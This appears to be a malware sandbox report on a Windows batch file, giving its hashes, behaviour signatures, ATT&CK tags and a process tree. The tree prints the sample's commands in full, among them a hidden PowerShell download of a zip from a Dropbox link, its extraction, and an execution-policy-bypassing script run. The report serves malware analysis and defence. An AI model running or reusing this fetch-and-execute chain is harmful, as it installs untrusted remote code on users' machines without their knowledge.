70fbc646366a3184c596ed7cba7055f1405350d164d104fcf4c2eec71c9d6434

Resubmissions

19-11-2024 20:58

241119-zr8a3sxmbp 10

19-11-2024 20:54

241119-zp5r6stalq 8

Analysis

max time kernel
360s
max time network
319s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
19-11-2024 20:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

slut_keep_admin.bat
Size

1KB
MD5

9152962b6cef0d476f4e89127d8f0255
SHA1

b3b0b2686f0b27eff516ca35443feff8ff5f8026
SHA256

70fbc646366a3184c596ed7cba7055f1405350d164d104fcf4c2eec71c9d6434
SHA512

b609ecc36ea6e417b45099092d1511da78af19855252cbf5050d30abd6d2ee3def57518c5c8676e25e0786cfd22c7bd5dcd98a4da725db2fa102256ad4f3d80e

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2804 powershell.exe
2804 powershell.exe
2720 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2804 powershell.exe
2720 powershell.exe

pid	process
2804	powershell.exe
2804	powershell.exe
2720	powershell.exe

pid	process
2804	powershell.exe
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exe7z.exepowershell.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeRestorePrivilege	2316	7z.exe
Token: 35	2316	7z.exe
Token: SeSecurityPrivilege	2316	7z.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: 33	1136	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1136	AUDIODG.EXE
Token: 33	1136	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1136	AUDIODG.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2380 wrote to memory of 2552	2380	cmd.exe	cacls.exe
PID 2380 wrote to memory of 2552	2380	cmd.exe	cacls.exe
PID 2380 wrote to memory of 2552	2380	cmd.exe	cacls.exe
PID 2380 wrote to memory of 2804	2380	cmd.exe	powershell.exe
PID 2380 wrote to memory of 2804	2380	cmd.exe	powershell.exe
PID 2380 wrote to memory of 2804	2380	cmd.exe	powershell.exe
PID 2380 wrote to memory of 2316	2380	cmd.exe	7z.exe
PID 2380 wrote to memory of 2316	2380	cmd.exe	7z.exe
PID 2380 wrote to memory of 2316	2380	cmd.exe	7z.exe
PID 2380 wrote to memory of 2720	2380	cmd.exe	powershell.exe
PID 2380 wrote to memory of 2720	2380	cmd.exe	powershell.exe
PID 2380 wrote to memory of 2720	2380	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\slut_keep_admin.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/k55ow4tu1244zp5vbpkdf/AH836nAwzR-bPAcWIy0mnFU?rlkey=6s1decbh5kqtkju1mr1sbjg4s&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Program Files\7-Zip\7z.exe
  "C:/Program Files/7-Zip/7z.exe" x -aoa "C:/ProgramData/slut/files.zip"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -file "installJavaAndApp.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2720

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2028

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x5d0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IULJKMZKPHDZ8WVHRAIT.temp

Filesize
7KB

MD5
3bfdf6f6c4ee8ba395b96a3697d28ba5

SHA1
59bcc08fd64cd585e5d523f37da2339f551cbc48

SHA256
f38230bd9f6f84df2c3acb46f28216fa8835b99005b7699150dda41c1baead66

SHA512
3fee1df6a3d5ba19120e335104eb19d3b121b711b3f21597a432b365db448cf3642ed46439f8c4aa7440d4c8c35e8d0385065bbbb77a381bf9280e65edc67919

Download Submit
memory/2720-17-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2720-18-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2804-4-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

Filesize
4KB

Download
memory/2804-6-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-5-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

Filesize
9.6MB

Download
memory/2804-7-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

Filesize
9.6MB

Download
memory/2804-9-0x0000000002590000-0x0000000002598000-memory.dmp

Filesize
32KB

Download
memory/2804-8-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

Filesize
9.6MB

Download
memory/2804-10-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

Filesize
9.6MB

Download
memory/2804-11-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

Filesize
9.6MB

Download